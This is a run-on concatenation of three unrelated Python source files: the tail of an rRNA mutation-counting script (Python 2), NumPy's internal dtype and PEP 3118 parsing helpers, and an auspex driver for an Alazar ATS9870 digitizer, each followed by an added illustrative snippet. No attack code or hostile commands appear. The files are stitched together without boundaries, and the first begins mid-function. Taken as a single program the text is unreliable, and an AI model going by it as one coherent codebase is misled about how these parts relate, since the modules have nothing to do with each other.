Thus the original 5' end of the read actually # was x nt downstream on the + strand start=int(fields[3])+genomeMappingSpan-1 # translate relative positions to absolute positions genome_cov = readGenomicCoverage(rel_genome_coverage, strand, start) # get genome coverage srt_dict[strand][chrom][start] += counts #just add the number of counts to that start position for pos in genome_cov: # Increment positions for coverage dict cov_dict[strand][chrom][pos] += counts # If mismatches need to parse, get the absolute genomic pos, and increment counters genMismatches = readGenomicCoverage(rel_genomic_event_positions, strand, start) for event_position in genMismatches: mut_dict[strand][chrom][event_position] += counts mod_utils.makePickle(srt_dict, lib_settings.get_read_5p_counts()) mod_utils.makePickle(cov_dict, lib_settings.get_positional_coverage()) mod_utils.makePickle(mut_dict, lib_settings.get_mutation_counts()) mod_utils.makePickle(genome_mutations, lib_settings.get_counting_prefix() + '.genome_mutations.pkl') mod_utils.makePickle(mutations_by_genome_position, lib_settings.get_counting_prefix() + '.genome_position_mutations.pkl') mod_utils.makePickle(genome_position_coverage, lib_settings.get_counting_prefix() + '.genome_position_coverage.pkl') mod_utils.makePickle(mutated_nts, lib_settings.get_counting_prefix() + '.nt_mutations.pkl') mod_utils.makePickle(read_mutations, lib_settings.get_counting_prefix() + '.read_mutations.pkl') mod_utils.makePickle(mutations_by_read_position, lib_settings.get_counting_prefix() + '.read_position_mutations.pkl') mod_utils.makePickle(read_position_coverage, lib_settings.get_counting_prefix() + '.read_position_coverage.pkl') mod_utils.makePickle(genomic_deletion_sizes, lib_settings.get_counting_prefix() + '.deletion_sizes.pkl') mod_utils.makePickle(read_insertion_sizes, lib_settings.get_counting_prefix() + '.insertion_sizes.pkl') normalized_mutations = normalized_mutation_rates(mod_utils.unPickle(lib_settings.get_mutation_counts()), mod_utils.unPickle(lib_settings.get_positional_coverage())) mod_utils.makePickle(normalized_mutations, lib_settings.get_normalized_mutation_counts()) plot_mutated_nts_pie(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.nt_mutations.pkl'), 'mutated rRNA nts in ' + lib_settings.sample_name, lib_settings.get_counting_prefix()+'.mutated_nts' ) plot_full_mutation_stats(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.insertion_sizes.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_position_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_position_coverage.pkl'), 'mutations wrt reads', "insertion size", lib_settings.get_counting_prefix()+'.read_mutations') plot_full_mutation_stats(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.deletion_sizes.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_position_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_position_coverage.pkl'), 'mutations wrt genome', "deletion size", lib_settings.get_counting_prefix()+'.genome_mutations') pie_read_5p_ends(mod_utils.unPickle(lib_settings.get_read_5p_counts()), mod_utils.convertFastaToDict(lib_settings.experiment_settings.get_rRNA_fasta()), lib_settings.get_counting_prefix()) 
normed_mutation_rate_histogram(mod_utils.unPickle(lib_settings.get_normalized_mutation_counts()), lib_settings.sample_name, lib_settings.get_counting_prefix()) def test(): """ with uncommented print statements should get: parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG') ['M', ('A', 'G'), ('C', 'A'), ('C', 'T'), ('C', 'A'), 'M', ('T', 'G'), ('C', 'G'), ('T', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] ['M', ('A', 'G'), ('C', 'A'), ('C', 'T'), ('C', 'A'), 'M', ('T', 'G'), ('C', 'G'), ('T', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 36 parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT') [('C', 'G'), 'M', ('C', 'G'), ('C', 'A'), 'M', ('C', 'G'), ('I', 1), ('T', 'G'), ('C', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] [('C', 'G'), 'M', ('C', 'G'), ('C', 'A'), 'M', ('C', 'G'), ('T', 'G'), ('C', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 35 parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC') ['M', 'M', ('G', 'T'), ('A', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] ['M', 'M', ('G', 'T'), ('A', 'G'), 'M', 'M', 'M', 'M', 'M', ('D', 9), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 45 """ print "parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG')" parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG') print "parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT')" parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT') print "parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC')" parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC') #test()
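# ---------------------------------------------------------------------------
# Illustrative sketch, separate from parse_MDz_and_cigar() above: the CIGAR
# handling boils down to two lookup tables recording whether each operation
# consumes read bases, reference bases, or both. The standalone helper below
# (hypothetical name cigar_spans) computes just the two mapping spans.
import re


def cigar_spans(cigar):
    """Return (read_span, genome_span) implied by a CIGAR string."""
    read_consumes = {'M': 1, 'I': 1, 'D': 0, 'N': 0, '=': 1, 'X': 1}
    genome_consumes = {'M': 1, 'I': 0, 'D': 1, 'N': 1, '=': 1, 'X': 1}
    read_span = genome_span = 0
    for length, op in re.findall(r'(\d+)([MIDN=X])', cigar):
        read_span += read_consumes[op] * int(length)
        genome_span += genome_consumes[op] * int(length)
    return read_span, genome_span


# e.g. cigar_spans('6M1I29M') -> (36, 35) and cigar_spans('9M9D27M') -> (36, 45),
# matching the read/genome mapping spans listed in the test() docstring above.
# ---------------------------------------------------------------------------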
""" A place for code to be called from core C-code. Some things are more easily handled Python. """ from __future__ import division, absolute_import, print_function import re import sys from numpy.compat import basestring from .multiarray import dtype, array, ndarray import ctypes from .numerictypes import object_ if (sys.byteorder == 'little'): _nbo = b'<' else: _nbo = b'>' def _makenames_list(adict, align): allfields = [] fnames = list(adict.keys()) for fname in fnames: obj = adict[fname] n = len(obj) if not isinstance(obj, tuple) or n not in [2, 3]: raise ValueError("entry not a 2- or 3- tuple") if (n > 2) and (obj[2] == fname): continue num = int(obj[1]) if (num < 0): raise ValueError("invalid offset.") format = dtype(obj[0], align=align) if (n > 2): title = obj[2] else: title = None allfields.append((fname, format, num, title)) # sort by offsets allfields.sort(key=lambda x: x[2]) names = [x[0] for x in allfields] formats = [x[1] for x in allfields] offsets = [x[2] for x in allfields] titles = [x[3] for x in allfields] return names, formats, offsets, titles # Called in PyArray_DescrConverter function when # a dictionary without "names" and "formats" # fields is used as a data-type descriptor. def _usefields(adict, align): try: names = adict[-1] except KeyError: names = None if names is None: names, formats, offsets, titles = _makenames_list(adict, align) else: formats = [] offsets = [] titles = [] for name in names: res = adict[name] formats.append(res[0]) offsets.append(res[1]) if (len(res) > 2): titles.append(res[2]) else: titles.append(None) return dtype({"names": names, "formats": formats, "offsets": offsets, "titles": titles}, align) # construct an array_protocol descriptor list # from the fields attribute of a descriptor # This calls itself recursively but should eventually hit # a descriptor that has no fields and then return # a simple typestring def _array_descr(descriptor): fields = descriptor.fields if fields is None: subdtype = descriptor.subdtype if subdtype is None: if descriptor.metadata is None: return descriptor.str else: new = descriptor.metadata.copy() if new: return (descriptor.str, new) else: return descriptor.str else: return (_array_descr(subdtype[0]), subdtype[1]) names = descriptor.names ordered_fields = [fields[x] + (x,) for x in names] result = [] offset = 0 for field in ordered_fields: if field[1] > offset: num = field[1] - offset result.append(('', '|V%d' % num)) offset += num if len(field) > 3: name = (field[2], field[3]) else: name = field[2] if field[0].subdtype: tup = (name, _array_descr(field[0].subdtype[0]), field[0].subdtype[1]) else: tup = (name, _array_descr(field[0])) offset += field[0].itemsize result.append(tup) if descriptor.itemsize > offset: num = descriptor.itemsize - offset result.append(('', '|V%d' % num)) return result # Build a new array from the information in a pickle. # Note that the name numpy.core._internal._reconstruct is embedded in # pickles of ndarrays made with NumPy before release 1.0 # so don't remove the name here, or you'll # break backward compatibilty. def _reconstruct(subtype, shape, dtype): return ndarray.__new__(subtype, shape, dtype) # format_re was originally from numarray by J. Todd Miller format_re = re.compile(br'(?P<order1>[<>|=]?)' br'(?P<repeats> *[(]?[ ,0-9L]*[)]? 
*)' br'(?P<order2>[<>|=]?)' br'(?P<dtype>[A-Za-z0-9.?]*(?:\[[a-zA-Z0-9,.]+\])?)') sep_re = re.compile(br'\s*,\s*') space_re = re.compile(br'\s+$') # astr is a string (perhaps comma separated) _convorder = {b'=': _nbo} def _commastring(astr): startindex = 0 result = [] while startindex < len(astr): mo = format_re.match(astr, pos=startindex) try: (order1, repeats, order2, dtype) = mo.groups() except (TypeError, AttributeError): raise ValueError('format number %d of "%s" is not recognized' % (len(result)+1, astr)) startindex = mo.end() # Separator or ending padding if startindex < len(astr): if space_re.match(astr, pos=startindex): startindex = len(astr) else: mo = sep_re.match(astr, pos=startindex) if not mo: raise ValueError( 'format number %d of "%s" is not recognized' % (len(result)+1, astr)) startindex = mo.end() if order2 == b'': order = order1 elif order1 == b'': order = order2 else: order1 = _convorder.get(order1, order1) order2 = _convorder.get(order2, order2) if (order1 != order2): raise ValueError( 'inconsistent byte-order specification %s and %s' % (order1, order2)) order = order1 if order in [b'|', b'=', _nbo]: order = b'' dtype = order + dtype if (repeats == b''): newitem = dtype else: newitem = (dtype, eval(repeats)) result.append(newitem) return result def _getintp_ctype(): val = _getintp_ctype.cache if val is not None: return val char = dtype('p').char if (char == 'i'): val = ctypes.c_int elif char == 'l': val = ctypes.c_long elif char == 'q': val = ctypes.c_longlong else: val = ctypes.c_long _getintp_ctype.cache = val return val _getintp_ctype.cache = None # Used for .ctypes attribute of ndarray class _missing_ctypes(object): def cast(self, num, obj): return num def c_void_p(self, num): return num class _ctypes(object): def __init__(self, array, ptr=None): try: self._ctypes = ctypes except ImportError: self._ctypes = _missing_ctypes() self._arr = array self._data = ptr if self._arr.ndim == 0: self._zerod = True else: self._zerod = False def data_as(self, obj): return self._ctypes.cast(self._data, obj) def shape_as(self, obj): if self._zerod: return None return (obj*self._arr.ndim)(*self._arr.shape) def strides_as(self, obj): if self._zerod: return None return (obj*self._arr.ndim)(*self._arr.strides) def get_data(self): return self._data def get_shape(self): if self._zerod: return None return (_getintp_ctype()*self._arr.ndim)(*self._arr.shape) def get_strides(self): if self._zerod: return None return (_getintp_ctype()*self._arr.ndim)(*self._arr.strides) def get_as_parameter(self): return self._ctypes.c_void_p(self._data) data = property(get_data, None, doc="c-types data") shape = property(get_shape, None, doc="c-types shape") strides = property(get_strides, None, doc="c-types strides") _as_parameter_ = property(get_as_parameter, None, doc="_as parameter_") # Given a datatype and an order object # return a new names tuple # with the order indicated def _newnames(datatype, order): oldnames = datatype.names nameslist = list(oldnames) if isinstance(order, str): order = [order] if isinstance(order, (list, tuple)): for name in order: try: nameslist.remove(name) except ValueError: raise ValueError("unknown field name: %s" % (name,)) return tuple(list(order) + nameslist) raise ValueError("unsupported order value: %s" % (order,)) def _copy_fields(ary): """Return copy of structured array with padding between fields removed. 
Parameters ---------- ary : ndarray Structured array from which to remove padding bytes Returns ------- ary_copy : ndarray Copy of ary with padding bytes removed """ dt = ary.dtype copy_dtype = {'names': dt.names, 'formats': [dt.fields[name][0] for name in dt.names]} return array(ary, dtype=copy_dtype, copy=True) def _getfield_is_safe(oldtype, newtype, offset): """ Checks safety of getfield for object arrays. As in _view_is_safe, we need to check that memory containing objects is not reinterpreted as a non-object datatype and vice versa. Parameters ---------- oldtype : data-type Data type of the original ndarray. newtype : data-type Data type of the field being accessed by ndarray.getfield offset : int Offset of the field being accessed by ndarray.getfield Raises ------ TypeError If the field access is invalid """ if newtype.hasobject or oldtype.hasobject: if offset == 0 and newtype == oldtype: return if oldtype.names: for name in oldtype.names: if (oldtype.fields[name][1] == offset and oldtype.fields[name][0] == newtype): return raise TypeError("Cannot get/set field of an object array") return def _view_is_safe(oldtype, newtype): """ Checks safety of a view involving object arrays, for example when doing:: np.zeros(10, dtype=oldtype).view(newtype) Parameters ---------- oldtype : data-type Data type of original ndarray newtype : data-type Data type of the view Raises ------ TypeError If the new type is incompatible with the old type. """ # if the types are equivalent, there is no problem. # for example: dtype((np.record, 'i4,i4')) == dtype((np.void, 'i4,i4')) if oldtype == newtype: return if newtype.hasobject or oldtype.hasobject: raise TypeError("Cannot change data-type for object array.") return # Given a string containing a PEP 3118 format specifier, # construct a NumPy dtype _pep3118_native_map = { '?': '?', 'c': 'S1', 'b': 'b', 'B': 'B', 'h': 'h', 'H': 'H', 'i': 'i', 'I': 'I', 'l': 'l', 'L': 'L', 'q': 'q', 'Q': 'Q', 'e': 'e', 'f': 'f', 'd': 'd', 'g': 'g', 'Zf': 'F', 'Zd': 'D', 'Zg': 'G', 's': 'S', 'w': 'U', 'O': 'O', 'x': 'V', # padding } _pep3118_native_typechars = ''.join(_pep3118_native_map.keys()) _pep3118_standard_map = { '?': '?', 'c': 'S1', 'b': 'b', 'B': 'B', 'h': 'i2', 'H': 'u2', 'i': 'i4', 'I': 'u4', 'l': 'i4', 'L': 'u4', 'q': 'i8', 'Q': 'u8', 'e': 'f2', 'f': 'f', 'd': 'd', 'Zf': 'F', 'Zd': 'D', 's': 'S', 'w': 'U', 'O': 'O', 'x': 'V', # padding } _pep3118_standard_typechars = ''.join(_pep3118_standard_map.keys()) def _dtype_from_pep3118(spec, byteorder='@', is_subdtype=False): fields = {} offset = 0 explicit_name = False this_explicit_name = False common_alignment = 1 is_padding = False dummy_name_index = [0] def next_dummy_name(): dummy_name_index[0] += 1 def get_dummy_name(): while True: name = 'f%d' % dummy_name_index[0] if name not in fields: return name next_dummy_name() # Parse spec while spec: value = None # End of structure, bail out to upper level if spec[0] == '}': spec = spec[1:] break # Sub-arrays (1) shape = None if spec[0] == '(': j = spec.index(')') shape = tuple(map(int, spec[1:j].split(','))) spec = spec[j+1:] # Byte order if spec[0] in ('@', '=', '<', '>', '^', '!'): byteorder = spec[0] if byteorder == '!': byteorder = '>' spec = spec[1:] # Byte order characters also control native vs. 
standard type sizes if byteorder in ('@', '^'): type_map = _pep3118_native_map type_map_chars = _pep3118_native_typechars else: type_map = _pep3118_standard_map type_map_chars = _pep3118_standard_typechars # Item sizes itemsize = 1 if spec[0].isdigit(): j = 1 for j in range(1, len(spec)): if not spec[j].isdigit(): break itemsize = int(spec[:j]) spec = spec[j:] # Data types is_padding = False if spec[:2] == 'T{': value, spec, align, next_byteorder = _dtype_from_pep3118( spec[2:], byteorder=byteorder, is_subdtype=True) elif spec[0] in type_map_chars: next_byteorder = byteorder if spec[0] == 'Z': j = 2 else: j = 1 typechar = spec[:j] spec = spec[j:] is_padding = (typechar == 'x') dtypechar = type_map[typechar] if dtypechar in 'USV': dtypechar += '%d' % itemsize itemsize = 1 numpy_byteorder = {'@': '=', '^': '='}.get(byteorder, byteorder) value = dtype(numpy_byteorder + dtypechar) align = value.alignment else: raise ValueError("Unknown PEP 3118 data type specifier %r" % spec) # # Native alignment may require padding # # Here we assume that the presence of a '@' character implicitly implies # that the start of the array is *already* aligned. # extra_offset = 0 if byteorder == '@': start_padding = (-offset) % align intra_padding = (-value.itemsize) % align offset += start_padding if intra_padding != 0: if itemsize > 1 or (shape is not None and _prod(shape) > 1): # Inject internal padding to the end of the sub-item value = _add_trailing_padding(value, intra_padding) else: # We can postpone the injection of internal padding, # as the item appears at most once extra_offset += intra_padding # Update common alignment common_alignment = (align*common_alignment / _gcd(align, common_alignment)) # Convert itemsize to sub-array if itemsize != 1: value = dtype((value, (itemsize,))) # Sub-arrays (2) if shape is not None: value = dtype((value, shape)) # Field name this_explicit_name = False if spec and spec.startswith(':'): i = spec[1:].index(':') + 1 name = spec[1:i] spec = spec[i+1:] explicit_name = True this_explicit_name = True else: name = get_dummy_name() if not is_padding or this_explicit_name: if name in fields: raise RuntimeError("Duplicate field name '%s' in PEP3118 format" % name) fields[name] = (value, offset) if not this_explicit_name: next_dummy_name() byteorder = next_byteorder offset += value.itemsize offset += extra_offset # Check if this was a simple 1-item type if (len(fields) == 1 and not explicit_name and fields['f0'][1] == 0 and not is_subdtype): ret = fields['f0'][0] else: ret = dtype(fields) # Trailing padding must be explicitly added padding = offset - ret.itemsize if byteorder == '@': padding += (-offset) % common_alignment if is_padding and not this_explicit_name: ret = _add_trailing_padding(ret, padding) # Finished if is_subdtype: return ret, spec, common_alignment, byteorder else: return ret def _add_trailing_padding(value, padding): """Inject the specified number of padding bytes at the end of a dtype""" if value.fields is None: vfields = {'f0': (value, 0)} else: vfields = dict(value.fields) if (value.names and value.names[-1] == '' and value[''].char == 'V'): # A trailing padding field is already present vfields[''] = ('V%d' % (vfields[''][0].itemsize + padding), vfields[''][1]) value = dtype(vfields) else: # Get a free name for the padding field j = 0 while True: name = 'pad%d' % j if name not in vfields: vfields[name] = ('V%d' % padding, value.itemsize) break j += 1 value = dtype(vfields) if '' not in vfields: # Strip out the name of the padding field names = 
list(value.names) names[-1] = '' value.names = tuple(names) return value def _prod(a): p = 1 for x in a: p *= x return p def _gcd(a, b): """Calculate the greatest common divisor of a and b""" while b: a, b = b, a % b return a # Exception used in shares_memory() class TooHardError(RuntimeError): pass class AxisError(ValueError, IndexError): """ Axis supplied was invalid. """ def __init__(self, axis, ndim=None, msg_prefix=None): # single-argument form just delegates to base class if ndim is None and msg_prefix is None: msg = axis # do the string formatting here, to save work in the C code else: msg = ("axis {} is out of bounds for array of dimension {}" .format(axis, ndim)) if msg_prefix is not None: msg = "{}: {}".format(msg_prefix, msg) super(AxisError, self).__init__(msg)
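# --- Illustrative sketch (not part of the module) -----------------------------
# Small demonstration of a few of the private helpers defined above, wrapped in
# a function so nothing runs at import time. It relies on the module's own
# `dtype` (NumPy's dtype) and on the helpers being module-level names.
def _demo_internal_helpers():
    dt = dtype([('x', 'i4'), ('y', 'f8'), ('z', 'u1')])
    # _newnames moves the requested field(s) to the front, keeping the rest in order
    assert _newnames(dt, ['z']) == ('z', 'x', 'y')
    # _prod and _gcd are the small arithmetic helpers used by the PEP 3118 parser
    assert _prod((2, 3, 4)) == 24
    assert _gcd(12, 8) == 4
    # AxisError builds the standard out-of-bounds message from (axis, ndim)
    assert 'axis 2 is out of bounds for array of dimension 1' in str(AxisError(2, ndim=1))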
# Copyright 2016 Raytheon BBN Technologies # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 __all__ = ['AlazarATS9870', 'AlazarChannel'] import re import socket import struct import datetime, time import sys import numpy as np from multiprocessing import Value from .instrument import Instrument, ReceiverChannel from auspex.log import logger import auspex.config as config from unittest.mock import MagicMock # win32 doesn't support MSG_WAITALL, so on windows we # need to do things a slower, less efficient way. # (we could optimize this, if performance becomes a problem) # # TODO: this code is repeated in the X6 driver. # if sys.platform == 'win32': def sock_recvall(s, data_len): buf = bytearray() while data_len > 0: new = s.recv(data_len) data_len -= len(new) buf.extend(new) return bytes(buf) else: def sock_recvall(s, data_len): return s.recv(data_len, socket.MSG_WAITALL) class AlazarChannel(ReceiverChannel): phys_channel = None def __init__(self, receiver_channel=None): if receiver_channel: self.set_by_receiver(receiver_channel) def set_all(self, settings_dict): for name, value in settings_dict.items(): if hasattr(self, name): setattr(self, name, value) def set_by_receiver(self, receiver): self.phys_channel = receiver.channel class AlazarATS9870(Instrument): """Alazar ATS9870 digitizer""" instrument_type = ("Digitizer") def __init__(self, resource_name=None, name="Unlabeled Alazar", gen_fake_data=False): self.name = name # A list of AlazarChannel objects self.channels = [] self.resource_name = resource_name # For lookup self._chan_to_buf = {} self._chan_to_rsocket = {} self._chan_to_wsocket = {} self.last_timestamp = Value('d', datetime.datetime.now().timestamp()) self.fetch_count = Value('d', 0) self.total_received = Value('d', 0) self.gen_fake_data = gen_fake_data self.increment_ideal_data = False self.ideal_counter = 0 self.ideal_data = None np.random.seed(12345) def connect(self, resource_name=None): if config.auspex_dummy_mode or self.gen_fake_data: self.fake_alazar = True self._lib = MagicMock() else: try: from libalazar import ATS9870 self._lib = ATS9870() self.fake_alazar = False except: raise Exception("Could not find libalazar. 
You can run in dummy mode by setting config.auspex_dummy_mode \ or setting the gen_fake_data property of this instrument.") if resource_name: self.resource_name = resource_name self._lib.connect("{}/{}".format(self.name, int(self.resource_name))) for channel in self.channels: self.get_socket(channel) def acquire(self): self.fetch_count.value = 0 self.total_received.value = 0 self._lib.acquire() def stop(self): self._lib.stop() def data_available(self): return self._lib.data_available() def done(self): received = self.total_received.value expected = self.number_segments * self.number_averages * self.record_length * len(self.channels) #logger.debug(f"Checking alazar doneness: {received} {expected}") return received >= expected def get_socket(self, channel): if channel in self._chan_to_rsocket: return self._chan_to_rsocket[channel] try: rsock, wsock = socket.socketpair() except: raise Exception("Could not create read/write socket pair") self._lib.register_socket(channel.phys_channel - 1, wsock) # logger.info(f"Passing socket {wsock} to libalazar driver") self._chan_to_rsocket[channel] = rsock self._chan_to_wsocket[channel] = wsock return rsock def add_channel(self, channel): if not isinstance(channel, AlazarChannel): raise TypeError("Alazar passed {} rather than an AlazarChannel object.".format(str(channel))) # We can have either 1 or 2, or both. if len(self.channels) < 2 and channel not in self.channels: self.channels.append(channel) self._chan_to_buf[channel] = channel.phys_channel def spew_fake_data(self, counter, ideal_data, random_mag=0.1, random_seed=12345): """ Generate fake data on the stream. For unittest usage. ideal_data: array or list giving means of the expected signal for each segment Returns the total number of fake data points, so that we can keep track of how many we expect to receive, when we're doing the test with fake data """ for chan, wsock in self._chan_to_wsocket.items(): length = int(self.record_length) buff = np.zeros((self.number_segments, length), dtype=np.float32) for i in range(self.number_segments): signal = np.sin(np.linspace(0,10.0*np.pi,int(length/2))) buff[i, int(length/4):int(length/4)+len(signal)] = signal * (1.0 if ideal_data[i] == 0 else ideal_data[i]) buff += random_mag*np.random.random((self.number_segments, length)) wsock.send(struct.pack('n', self.number_segments*length*np.float32().itemsize) + buff.flatten().tobytes()) counter[chan] += length*self.number_segments return length*self.number_segments*len(self._chan_to_wsocket) def receive_data(self, channel, oc, exit, ready, run): sock = self._chan_to_rsocket[channel] sock.settimeout(2) self.last_timestamp.value = datetime.datetime.now().timestamp() last_print = datetime.datetime.now().timestamp() ready.value += 1 while not exit.is_set(): # push data from a socket into an OutputConnector (oc) # wire format is just: [size, buffer...] 
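            # In the fake-data path that prefix is written by spew_fake_data()
            # as a native size_t, struct.pack('n', nbytes), followed by the raw
            # float32 samples; the reader below unpacks the same 'n' format and
            # then drains exactly nbytes of payload from the socket.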
# TODO receive 4 or 8 bytes depending on sizeof(size_t) if not run.is_set(): continue # Block until we are running again #logger.info(f'Run set when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}') try: msg = sock.recv(8) self.last_timestamp.value = datetime.datetime.now().timestamp() except: logger.info("Didn't find any data on socket within 2 seconds (this is normal during experiment shutdown).") continue msg_size = struct.unpack('n', msg)[0] buf = sock_recvall(sock, msg_size) while len(buf) < msg_size: # time.sleep(0.01) buf2 = sock_recvall(sock, msg_size-len(buf)) buf = buf+buf2 data = np.frombuffer(buf, dtype=np.float32) self.total_received.value += len(data) if datetime.datetime.now().timestamp() - last_print > 0.25: last_print = datetime.datetime.now().timestamp() # logger.info(f"Alz: {self.total_received.value}") oc.push(data) self.fetch_count.value += 1 #logger.info(f'Exit set when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}') def get_buffer_for_channel(self, channel): self.fetch_count.value += 1 return getattr(self._lib, 'ch{}Buffer'.format(self._chan_to_buf[channel])) def wait_for_acquisition(self, dig_run, timeout=5, ocs=None, progressbars=None): progress_updaters = {} if ocs and progressbars: for oc in ocs: if hasattr(progressbars[oc], 'goto'): progress_updaters[oc] = lambda x: progressbars[oc].goto(x) else: progress_updaters[oc] = lambda x: setattr(progressbars[oc], 'value', x) if self.gen_fake_data: total_spewed = 0 counter = {chan: 0 for chan in self._chan_to_wsocket.keys()} initial_points = {oc: oc.points_taken.value for oc in ocs} # print(self.number_averages, self.number_segments) for j in range(self.number_averages): # for i in range(self.number_segments): if self.ideal_data is not None: #add ideal data for testing if hasattr(self, 'exp_step') and self.increment_ideal_data: raise Exception("Cannot use both exp_step and increment_ideal_data") elif hasattr(self, 'exp_step'): total_spewed += self.spew_fake_data( counter, self.ideal_data[self.exp_step]) elif self.increment_ideal_data: total_spewed += self.spew_fake_data( counter, self.ideal_data[self.ideal_counter]) else: total_spewed += self.spew_fake_data( counter, self.ideal_data) else: total_spewed += self.spew_fake_data(counter, [0.0 for i in range(self.number_segments)]) time.sleep(0.0001) self.ideal_counter += 1 while not self.done(): if not dig_run.is_set(): self.last_timestamp.value = datetime.datetime.now().timestamp() if (datetime.datetime.now().timestamp() - self.last_timestamp.value) > timeout: logger.info(f"timeout when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}") logger.error("Digitizer %s timed out. Timeout was %f, time was %f", self.name, timeout, (datetime.datetime.now().timestamp() - self.last_timestamp.value)) raise Exception("Alazar timed out.") if progressbars: for oc in ocs: progress_updaters[oc](oc.points_taken.value) #time.sleep(0.2) Does this need to be here at all? 
if progressbars: try: progressbars[oc].next() progressbars[oc].finish() except AttributeError: pass logger.info(f"Digitizer %s finished getting data when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}.", self.name) def configure_with_dict(self, settings_dict): config_dict = { 'acquireMode': 'digitizer', 'bandwidth': "Full" , 'clockType': "ref", 'delay': 0.0, 'enabled': True, 'label': 'Alazar', 'recordLength': settings_dict['record_length'], 'nbrSegments': self.proxy_obj.number_segments, 'nbrWaveforms': self.proxy_obj.number_waveforms, 'nbrRoundRobins': self.proxy_obj.number_averages, 'samplingRate': self.proxy_obj.sampling_rate, 'triggerCoupling': "DC", 'triggerLevel': 100, 'triggerSlope': "rising", 'triggerSource': "Ext", 'verticalCoupling': "DC", 'verticalOffset': 0.0, 'verticalScale': self.proxy_obj.vertical_scale } self._lib.setAll(config_dict) self.record_length = settings_dict['record_length'] self.number_acquisitions = self._lib.numberAcquisitions self.samples_per_acquisition = self._lib.samplesPerAcquisition self.number_segments = self.proxy_obj.number_segments self.number_waveforms = self.proxy_obj.number_waveforms self.number_averages = self.proxy_obj.number_averages self.ch1_buffer = self._lib.ch1Buffer self.ch2_buffer = self._lib.ch2Buffer self.record_length = settings_dict['record_length'] self.number_segments = self.proxy_obj.number_segments self.number_waveforms = self.proxy_obj.number_waveforms self.number_averages = self.proxy_obj.number_averages def disconnect(self): self._lib.disconnect() for socket in self._chan_to_rsocket.values(): socket.close() for socket in self._chan_to_wsocket.values(): socket.close() self._chan_to_rsocket.clear() self._chan_to_wsocket.clear() self._lib.unregister_sockets() def __str__(self): return "<AlazarATS9870({}/{})>".format(self.name, self.resource_name)
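# --- Illustrative usage sketch (not part of the driver) -----------------------
# Exercises the fake-data path roughly the way the unit tests do. The channel
# number and acquisition settings below are made-up values for the sketch, and
# it assumes the usual auspex.config settings are present; with
# gen_fake_data=True the libalazar library is replaced by a MagicMock, so no
# hardware is touched.
if __name__ == '__main__':
    dig = AlazarATS9870(resource_name="1", name="FakeAlazar", gen_fake_data=True)
    chan = AlazarChannel()
    chan.set_all({'phys_channel': 1})
    dig.add_channel(chan)

    # attributes normally filled in by configure_with_dict()
    dig.record_length = 1024
    dig.number_segments = 2
    dig.number_averages = 1

    dig.connect()
    counter = {chan: 0}
    total = dig.spew_fake_data(counter, ideal_data=[0.0, 1.0])
    print("fake samples pushed:", total)   # record_length * segments * channels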
